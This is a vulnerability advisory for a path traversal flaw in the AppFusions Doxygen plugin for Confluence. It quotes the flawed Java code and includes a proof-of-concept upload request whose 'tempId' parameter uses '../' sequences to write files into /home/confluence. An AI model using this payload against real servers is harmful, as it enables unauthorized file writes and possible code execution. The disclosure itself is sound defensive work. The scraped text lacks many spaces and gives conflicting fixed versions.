RCESecurityAdvisory
https://www.rcesecurity.com
1.ADVISORYINFORMATION=======================Product:AppFusionsDoxygenforAtlassianConfluenceVendorURL: www.appfusions.com
Type:PathTraversal[CWE-22]Date found:2016-06-23Date published:-CVSSv3Score:6.3(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)CVE:-2.CREDITS==========This vulnerability was discovered and researched by JulienAhrens from
RCESecurity.3.VERSIONSAFFECTED====================AppFusionsDoxygenforAtlassianConfluence v1.3.0
older versions may be affected too.4.INTRODUCTION===============WithDoxygen in Confluence, you can embed full-structure code documentation:-Doxygen blueprint in ConfluencetoallowDoxygen archive imports
-Display documentation from annotated sources such as Java(i.e.,JavaDoc),C++,Objective-C,C#,C,PHP,Python,IDL(Corba,Microsoft, and
UNO/OpenOffice
flavors),Fortran,VHDL,Tcl,D in Confluence.-Navigation supports code structure (classes, hierarchies, files), element
dependencies, inheritance and collaboration diagrams.-Search documentation from within Confluence-Restrict access towho can see/add what
-Doxygen in JIRA also available
(from the vendor's homepage)5.VULNERABILITYDETAILS========================The application offers the functionality toimportzippedDoxygen
documentations via a file upload tomake them available within a
Confluencepage. However the application does not properly validate the
"tempId" parameter, which represents the directory where the contents of
the uploaded file will be extracted and stored to. This leads toa path
traversal vulnerability when "/../" sequences are used as part of the
"tempId"parameter. Since the contents of the uploaded file are
extracted tothe traversed directory,this vulnerability could also lead
toRemoteCodeExecution.
InDoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
read as part of a GET request to"/plugins/servlet/doxygen/upload" and
afterwards used in a "getTemporaryDirectory()" call:String tempId = request.getParameter("tempId");String destination =this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();The"getTemporaryDirectory()" function is defined in
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
based on the "java.io.tmpdir" variable, the static string
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
between all parts:publicFilegetTemporaryDirectory(String tempId){File file =newFile(System.getProperty("java.io.tmpdir")+File.separator +"doxygen-temp"+File.separator + tempId);return file;}In the subsequent code the uploaded file as represented by the "file"HTTPPOST parameter to"/plugins/servlet/doxygen/upload" is extracted tothe directory which was built using the "file"object.
The following Proof-of-Concept triggers this vulnerability by uploading
a zipped file, which will be extracted to"/home/confluence" by the
application:POST/plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence
HTTP/1.1Host:127.0.0.1User-Agent:Mozilla/5.0(X11;Linux x86_64; rv:46.0)Gecko/20100101Firefox/46.0Accept: application/json
Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With:XMLHttpRequestContent-Length:966Content-Type: multipart/form-data;
boundary=---------------------------62841490314755966452122422550Cookie: doc-sidebar=300px; doxygen_width=256;JSESSIONID=75A487B49F38A536358C728B1BE5A9E1Connection: close
-----------------------------62841490314755966452122422550Content-Disposition: form-data; name="file"; filename="Traversal.zip"Content-Type: application/zip
[zipped data]-----------------------------98001232218371736091795669059--6.RISK=======To successfully exploit this vulnerability the attacker must be
authenticated and must have the rights within AtlassianConfluencetouploadDoxygen files (default).The vulnerability allows remote attackers toupload arbitrary files toany destination directory writeable by the user of the web server, which
could lead toRemoteCodeExecution.7.SOLUTION===========UpdatetoAppFusionsDoxygenforAtlassianConfluence v1.3.48.REPORTTIMELINE(DD/MM/YYYY)===============================23/06/2016:Discovery of the vulnerability
23/06/2016:Notified vendor via public security mail address
29/06/2016:No response, sent out another notification w/o details
29/06/2016:Response from vendor who asked for full details
30/06/2016:Sent over preliminary advisory withfull details
03/07/2016:No response from vendor, sent out a status request
03/07/2016:Vendor temporarily removes product from website
11/07/2016:Vendor releases v1.3.1 which fixes the issue
20/11/2016:Advisory released